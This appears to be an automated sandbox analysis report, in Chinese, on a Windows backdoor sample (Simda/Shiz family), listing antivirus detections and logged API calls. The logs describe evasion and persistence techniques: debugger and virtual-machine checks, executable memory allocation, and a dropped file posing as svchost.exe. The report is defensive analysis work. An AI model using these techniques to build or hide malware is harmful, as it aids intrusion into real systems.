10.4
0-day
66 个模型检测该样本为恶意!
重新分析
更多

04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4

04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe

分析耗时

294s

最近分析

382天前

文件大小

711.0KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN BACKDOOR ULISE
鹰眼引擎
DACN 0.14
FACILE 1.00
IMCLNet 0.74
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Backdoor:Win32/Simda.650fe7e4 20190527 0.3.0.5
Avast Win32:Shiz-JT [Trj] 20200306 18.4.3895.0
Baidu Win32.Trojan-Spy.Shiz.b 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Kingsoft None 20200306 2013.8.14.323
McAfee BackDoor-FDOB!53EFB5B31544 20200304 6.0.6.653
Tencent Malware.Win32.Gencirc.10b3d603 20200306 1.0.0.1
静态指标
查询计算机名称 (17 个事件)
Time & API Arguments Status Return Repeated
1727545298.203125
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.078125
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.094125
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.343625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.358625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.937625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545397.999625
GetComputerNameA
computer_name: TU-PC
success 1 0
1727545401.70325
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.76625
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.89125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.89125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.98425
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545402.03125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545402.06325
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545412.34425
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.2655
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545401.375375
GetComputerNameW
computer_name: TU-PC
success 1 0
检查进程是否被调试器调试 (15 个事件)
Time & API Arguments Status Return Repeated
1727545297.37525
IsDebuggerPresent
failed 0 0
1727545297.922125
IsDebuggerPresent
failed 0 0
1727545298.984125
IsDebuggerPresent
failed 0 0
1727545299.609125
IsDebuggerPresent
failed 0 0
1727545300.594125
IsDebuggerPresent
failed 0 0
1727545301.688125
IsDebuggerPresent
failed 0 0
1727545301.969125
IsDebuggerPresent
failed 0 0
1727545302.578125
IsDebuggerPresent
failed 0 0
1727545302.641125
IsDebuggerPresent
failed 0 0
1727545302.813125
IsDebuggerPresent
failed 0 0
1727545302.828125
IsDebuggerPresent
failed 0 0
1727545393.391125
IsDebuggerPresent
failed 0 0
1727545394.719125
IsDebuggerPresent
failed 0 0
1727545397.453125
IsDebuggerPresent
failed 0 0
1727545397.531125
IsDebuggerPresent
failed 0 0
收集信息以指纹识别系统 (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
检查系统中的内存量,这可以用于检测可用内存较少的虚拟机 (3 个事件)
Time & API Arguments Status Return Repeated
1727545397.296625
GlobalMemoryStatusEx
success 1 0
1727545401.67225
GlobalMemoryStatusEx
success 1 0
1727545401.3905
GlobalMemoryStatusEx
success 1 0
一个或多个进程崩溃 (3 个事件)
Time & API Arguments Status Return Repeated
1727545397.453125
__exception__
exception.address: 0x7759fda5
exception.instruction: add byte ptr [ebx + eax + 0x64042454], al
exception.instruction_r: 00 84 03 54 24 04 64 ff 15 c0 00 00 00 83 c4 04
exception.symbol: NtQuerySystemInformation+0x5 NtOpenSection-0x13 ntdll+0x1fda5
exception.exception_code: 0xc0000005
registers.eax: 51
registers.ecx: 0
registers.edx: 48632448
registers.ebx: 8
registers.esp: 49738724
registers.ebp: 49738800
registers.esi: 72380164
registers.edi: 0
stacktrace: 
0x3677782
ReleaseHdwInfo+0x10f72a computerz_hardwaredll+0x1ad98a @ 0x741dd98a
ReleaseHdwInfo+0x10f668 computerz_hardwaredll+0x1ad8c8 @ 0x741dd8c8
ReleaseHdwInfo+0x104336 computerz_hardwaredll+0x1a2596 @ 0x741d2596
ReleaseHdwInfo+0x2ef8a6 computerz_hardwaredll+0x38db06 @ 0x743bdb06
ReleaseHdwInfo+0x2ee611 computerz_hardwaredll+0x38c871 @ 0x743bc871
DirectXVersionProcess+0x4f2c NvidiaMonitorSizeOfProcess-0x3e4 computerz_hardwaredll+0x8539c @ 0x740b539c
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x767462fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x76746d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x767477c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7674788a
ReleaseHdwInfo+0x2ed3f0 computerz_hardwaredll+0x38b650 @ 0x743bb650
ReleaseHdwInfo+0x2eea03 computerz_hardwaredll+0x38cc63 @ 0x743bcc63
ReleaseHdwInfo+0x32b3bb computerz_hardwaredll+0x3c961b @ 0x743f961b
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

 success 0 0
1727545397.858625
__exception__
exception.address: 0x7759fda5
exception.instruction: add byte ptr [ebp + 0x4245403], al
exception.instruction_r: 00 85 03 54 24 04 64 ff 15 c0 00 00 00 83 c4 04
exception.symbol: NtQuerySystemInformation+0x5 NtOpenSection-0x13 ntdll+0x1fda5
exception.exception_code: 0xc0000005
registers.eax: 51
registers.ecx: 192
registers.edx: 50204864
registers.ebx: 8
registers.esp: 53556548
registers.ebp: 53556624
registers.esi: 2
registers.edi: 53557080
stacktrace: 
0x3327782
360tptmon+0x20aed @ 0xfc0aed
360tptmon+0x20d1b @ 0xfc0d1b
360tptmon+0x2163f @ 0xfc163f
_itow_s+0x4c _endthreadex-0x35 msvcrt+0x11287 @ 0x76ff1287
_endthreadex+0x6c _beginthreadex-0x6 msvcrt+0x11328 @ 0x76ff1328
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

 success 0 0
1727545397.874625
__exception__
exception.address: 0x7759fda5
exception.instruction: add byte ptr [ebp + 0x4245403], al
exception.instruction_r: 00 85 03 54 24 04 64 ff 15 c0 00 00 00 83 c4 04
exception.symbol: NtQuerySystemInformation+0x5 NtOpenSection-0x13 ntdll+0x1fda5
exception.exception_code: 0xc0000005
registers.eax: 51
registers.ecx: 44
registers.edx: 50204864
registers.ebx: 0
registers.esp: 53547996
registers.ebp: 53548072
registers.esi: 2002386336
registers.edi: 53548396
stacktrace: 
0x3327782
GetSystemInfo+0x1b SetPriorityClass-0x1b9 kernelbase+0xe6cd @ 0x76e8e6cd
New_kernel32_GetSystemInfo@4+0x62 New_kernel32_GetSystemTime@4-0x6c @ 0x63bd7b68
MiniDumpWriteDump+0x4dc2 dbghelp+0x4aafa @ 0x70a9aafa
StackWalk+0x309c MiniDumpReadDumpStream-0x474 dbghelp+0x4457b @ 0x70a9457b
MiniDumpReadDumpStream+0x113f MiniDumpWriteDump-0x20a dbghelp+0x45b2e @ 0x70a95b2e
MiniDumpWriteDump+0xf2 dbghelp+0x45e2a @ 0x70a95e2a
?RaiseException@@YAXXZ-0x2d6 crashreport+0x29aa @ 0x734e29aa

 success 0 0
行为判定
动态指标
提取了一个或多个潜在有趣的缓冲区,这些缓冲区通常包含注入的代码、配置数据等。
分配可读-可写-可执行内存(通常用于自解压) (50 out of 246 个事件)
Time & API Arguments Status Return Repeated
1727545298.078125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x02450000
region_size: 745472
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2228
success 0 0
1727545396.984125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03670000
region_size: 405504
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76789000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03600000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03600000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03600000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x035b0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76789000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03610000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03610000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03610000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03630000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03630000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03630000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03620000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03640000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03640000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03640000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03660000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03660000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03660000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03650000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x036e0000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036e0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036e0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03700000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03700000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x03700000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x036f0000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x76747000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.094125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x03810000
region_size: 4096
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
在文件系统上创建可执行文件 (1 个事件)
file C:\Windows\AppPatch\svchost.exe
创建可疑进程 (1 个事件)
cmdline C:\Windows\AppPatch\svchost.exe
投放一个二进制文件并执行它 (1 个事件)
file C:\Windows\AppPatch\svchost.exe
将可执行文件投放到用户的 AppData 文件夹 (1 个事件)
file C:\Users\Administrator\AppData\Local\Temp\E8D9.tmp
执行一个或多个 WMI 查询 (11 个事件)
wmi
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1"} WHERE AssocClass = Win32_IDEControllerDevice
wmi select Name, DeviceID from Win32_IDEController
wmi SELECT * FROM Win32_ComputerSystem
wmi ASSOCIATORS OF {Win32_USBController.DeviceID="PCI\\VEN_106B&DEV_003F&SUBSYS_00000000&REV_00\\3&267A616A&0&30"} WHERE AssocClass = Win32_USBControllerDevice
wmi select Name, DeviceID from Win32_SCSIController
wmi select Name, DeviceID from Win32_USBController
wmi SELECT * FROM Win32_DiskDrive
wmi Select * from WmiMonitorConnectionParams
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCI\\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\\3&267A616A&0&68"} WHERE AssocClass = Win32_IDEControllerDevice
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0"} WHERE AssocClass = Win32_IDEControllerDevice
一个进程创建了一个隐藏窗口 (6 个事件)
Time & API Arguments Status Return Repeated
1727545397.563125
ShellExecuteExW
filepath: C:\Program Files (x86)\DumpUper.exe
filepath_r: C:\Program Files (x86)\DumpUper.exe
parameters: --pep=49736944 --pid=348 --tid=1888 --src=lds --ver=5.1024.1727.514 --rep=0
show_type: 0
failed 0 0
1727545400.96925
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="DirectXVersionProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 1472
thread_identifier: 2692
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.03125
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="OpenCLTestProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 1496
thread_identifier: 1920
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.10925
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="NvidiaMonitorSizeOfProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 2520
thread_identifier: 2484
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.15625
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="WMITestProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 3036
thread_identifier: 364
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
1727545401.21925
CreateProcessInternalW
command_line: "C:\Program Files (x86)\360\360DrvMgr\Utils\dll_service.exe" --dll="ComputerZ_HardwareDll.dll" --entry="UsbDeviceProcess" --wnd=131386
inherit_handles: 0
current_directory:
filepath:
filepath_r:
creation_flags: 134217728 (CREATE_NO_WINDOW)
process_identifier: 696
thread_identifier: 848
process_handle: 0x000003e4
thread_handle: 0x000003e0
track: 1
success 1 0
搜索运行中的进程,可能用于识别沙箱规避、代码注入或内存转储的进程 (2 个事件)
重复搜索未找到的进程,您可能希望在分析期间运行一个网络浏览器 (50 out of 57 个事件)
Time & API Arguments Status Return Repeated
1727545297.37525
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.39125
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.39125
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.40625
Process32NextW
snapshot_handle: 0x000000a4
process_name: 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe
process_identifier: 2064
failed 0 0
1727545297.922125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545297.938125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545297.938125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545297.953125
Process32NextW
snapshot_handle: 0x000000a4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.000125
Process32NextW
snapshot_handle: 0x0000083c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.016125
Process32NextW
snapshot_handle: 0x0000083c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.016125
Process32NextW
snapshot_handle: 0x0000083c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.625125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.625125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.625125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545299.641125
Process32NextW
snapshot_handle: 0x000008e8
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.594125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.609125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.609125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545300.609125
Process32NextW
snapshot_handle: 0x00000924
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.688125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.688125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.703125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.703125
Process32NextW
snapshot_handle: 0x00000344
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.969125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.969125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.984125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545301.984125
Process32NextW
snapshot_handle: 0x00000578
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.578125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.594125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.594125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.594125
Process32NextW
snapshot_handle: 0x00000458
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.641125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.656125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.656125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.656125
Process32NextW
snapshot_handle: 0x000005c4
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.828125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.844125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.859125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.859125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.875125
Process32NextW
snapshot_handle: 0x00000830
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.875125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.891125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545302.891125
Process32NextW
snapshot_handle: 0x0000044c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545393.406125
Process32NextW
snapshot_handle: 0x00000ad0
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545393.406125
Process32NextW
snapshot_handle: 0x00000ad0
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545393.406125
Process32NextW
snapshot_handle: 0x00000ad0
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.719125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.719125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.734125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
1727545394.734125
Process32NextW
snapshot_handle: 0x00000b9c
process_name: svchost.exe
process_identifier: 2228
failed 0 0
创建一个命名为常见系统进程的进程 (1 个事件)
Time & API Arguments Status Return Repeated
1727545297.75025
CreateProcessInternalW
command_line:
inherit_handles: 0
current_directory:
filepath: C:\Windows\AppPatch\svchost.exe
filepath_r: C:\Windows\apppatch\svchost.exe
creation_flags: 0 ()
process_identifier: 2228
thread_identifier: 1428
process_handle: 0x000000e8
thread_handle: 0x000000f4
track: 1
success 1 0
执行一个或多个 WMI 查询以识别虚拟机 (8 个事件)
wmi SELECT * FROM Win32_ComputerSystem
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1"} WHERE AssocClass = Win32_IDEControllerDevice
wmi select Name, DeviceID from Win32_IDEController
wmi ASSOCIATORS OF {Win32_USBController.DeviceID="PCI\\VEN_106B&DEV_003F&SUBSYS_00000000&REV_00\\3&267A616A&0&30"} WHERE AssocClass = Win32_USBControllerDevice
